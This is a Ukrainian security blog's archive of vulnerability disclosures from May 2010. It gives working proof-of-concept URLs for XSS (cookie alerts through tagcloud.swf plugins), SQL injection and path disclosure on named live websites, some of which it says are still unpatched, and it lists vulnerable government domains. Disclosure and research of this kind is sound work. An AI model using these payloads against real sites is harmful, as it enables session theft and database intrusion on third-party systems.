Архів для категорії 'Уразливості'

Нові уразливості на www.cctvua.com

19:16 14.05.2010

31.10.2009

У березні, 09.03.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extaction та SQL Injection уразливості на секюріті проекті http://www.cctvua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.cctvua.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

14.05.2010

XSS:

http://www.cctvua.com/?p=202989;c=1;s=28/*%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.cctvua.com/?p=202989;c=0/*%3Cscript%3Ealert(document.cookie)%3C/script%3E;s=28

SQL DB Structure Extraction:

http://www.cctvua.com/?p=1;a=1′

SQL Injection:

http://www.cctvua.com/?p=1;a=version()

Зараз даний сайт вже не робить.

Нові уразливості на adbroker.ru

23:59 13.05.2010

Після попередніх уразливостей на adbroker.ru, у серпні, 20.08.2007, я знайшов нові уразливості на проекті http://adbroker.ru (веб брокер), зокрема Insufficient Anti-automation та Full path disclosure уразливості.

Повідмоляти в новинах на сайті про ці уразливості я не поспішав, бо адміни брокера не виправляли попередні дірки та й були винні мені гроші. Про що я вже писав. Тому я відклав на інший раз публікацію даних уразливостей. Зараз адміни adbroker.ru, як я вже писав, виправили всі попередні уразливості шляхом заміни старого кода системи, на новий (також дірявий).

Insufficient Anti-automation:

http://adbroker.ru/user_login.php (в капчі)
http://adbroker.ru/register.php (в капчі)
http://adbroker.ru/contact_us.php (була відсутня капча)

Капча на сайті adbroker.ru була вразлива до MustLive CAPTCHA bypass method, про який я писав в проекті MoBiC.

Full path disclosure:

http://adbroker.ru/includes/classes/class_campaign.php

http://adbroker.ru/includes/classes/class_order.php

http://adbroker.ru/includes/classes/class_site.php

http://adbroker.ru/includes/classes/class_user.php

http://adbroker.ru/includes/main_inc.php

http://adbroker.ru/includes/tabs.php

Зазначу, що зараз на сайті використовується та сама вразлива капча. Тому Insufficient Anti-automation уразливості на сайті все ще актуальні на всіх сторінках з капчою.

Добірка уразливостей

15:03 13.05.2010

В даній добірці уразливості в веб додатках:

  • RaakCms Multiple Vulnerabilities (деталі)
  • Eaton MGE OPS Network Shutdown Module - authentication bypass vulnerability and remote code execution (деталі)
  • Tinypug Multiple Vulnerabilities (деталі)
  • OpenCart CSRF Vulnerability (деталі)
  • New moodle packages fix several vulnerabilities (деталі)
  • show data sources ite config exploit (деталі)
  • Cpanel Bypass Safe mode [ extract tar.gz by Cpanel ] (деталі)
  • LANDesk OS command injection (деталі)
  • TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility (деталі)
  • Cisco Unified Communications Manager CAPF Denial of Service Vulnerability (деталі)

Уразливість в плагіні tagcloud для Kasseler CMS

23:53 12.05.2010

Раніше я вже писав про уразливість у віджеті Cumulus для BlogEngine.NET. Така ж уразливість є і в плагіні tagcloud для Kasseler CMS, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

У січні, 07.01.2010, я знайшов Cross-Site Scripting уразливість в плагіні tagcloud для Kasseler CMS. Дірку виявив на сайті http://gibdd.tambov.gov.ru під час своїх досліджень і 02.05.2010 я звернув увагу, що на сайті використовується CMS. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/includes/javascript/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/includes/javascript/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі всі версії tagcloud для Kasseler CMS.

Уразливість на www.imdb.com

19:23 12.05.2010

26.10.2009

У лютому, 25.02.2009, я знайшов Cross-Site Scripting уразливість на популярноу проекті http://www.imdb.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.imdb.com.

Детальна інформація про уразливості з’явиться пізніше.

12.05.2010

XSS:

Дана уразливість вже виправлена.

Добірка уразливостей

15:07 11.05.2010

В даній добірці уразливості в веб додатках:

  • New trac-git packages fix code execution (деталі)
  • New trac-git package fixes regression (деталі)
  • OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass (деталі)
  • Cross-Site Scripting (XSS) on CommonSpot server (деталі)
  • Tavanmand Portal (fckeditor) Remote Arbitrary File Upload Vulnerability (деталі)
  • eWebeditor ASP Version Multiple Vulnerabilities (деталі)
  • XSS vulnerability in Drupal’s MP3 Player contributed module (version 6.x-1.0-beta1) (деталі)
  • Joomla (com_gambling) SQL Injection Vulnerabilities (деталі)
  • Security Advisory for Bugzilla 3.0.10, 3.2.5, 3.4.4, and 3.5.2 (деталі)
  • Unauthorized reading confirmation from Outlook (деталі)

Уразливість у віджеті Cumulus для BlogEngine.NET

23:54 10.05.2010

Раніше я вже писав про уразливості в t3m_cumulus_tagcloud для TYPO3. Така ж XSS уразливість є й у віджеті Cumulus для BlogEngine.NET, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

У квітні, 30.04.2010, я знайшов Cross-Site Scripting уразливість у віджеті Cumulus для BlogEngine.NET. Дірку виявив на сайті http://planning.maryland.gov. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі всі версії Cumulus для BlogEngine.NET.

Нові сайти для Vulnerable Sites Database

19:21 10.05.2010

Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.

Нещодавно я відправив в БД даного проекту 15 сайтів. З них 10 старих дірявих сайтів, про які я вже писав в новинах раніше, та 5 нових уразливих сайтів.

Це діряві gov-сайти: cityofcalapan.gov.ph, www.iea.cyf.gov.pl, www.metinsabancishcek.gov.tr, www.tuzlaram.gov.tr, www.cayirovamuftulugu.gov.tr.

Уразливості на referat.com.ua

15:04 10.05.2010

22.10.2009

У лютому, 16.02.2009, я знайшов SQL Injection, Full path disclosure та SQL DB Structure Extaction уразливості на сайті http://referat.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

10.05.2010

SQL Injection:

http://referat.com.ua/referat_show.php?id=’%20or%20version()%3E4/*

Full path disclosure:

http://referat.com.ua/referat_show.php?id=’

SQL DB Structure Extaction:

http://referat.com.ua/referat_show.php?id=’

Дані уразливості досі не виправлені.

Уразливості в t3m_cumulus_tagcloud для TYPO3

23:51 01.05.2010

Раніше я вже писав про уразливість в Tagcloud для DLE. Така ж уразливість є і в плагіні t3m_cumulus_tagcloud для TYPO3, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Вчора, 30.04.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в плагіні t3m_cumulus_tagcloud для TYPO3. Уразливості виявив на сайті http://www.hospitalgranada.gov.co. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Full path disclosure:

http://site/typo3conf/ext/t3m_cumulus_tagcloud/pi1/class.tx_t3mcumulustagcloud_pi1.php

Уразлива версія t3m_cumulus_tagcloud 1.0.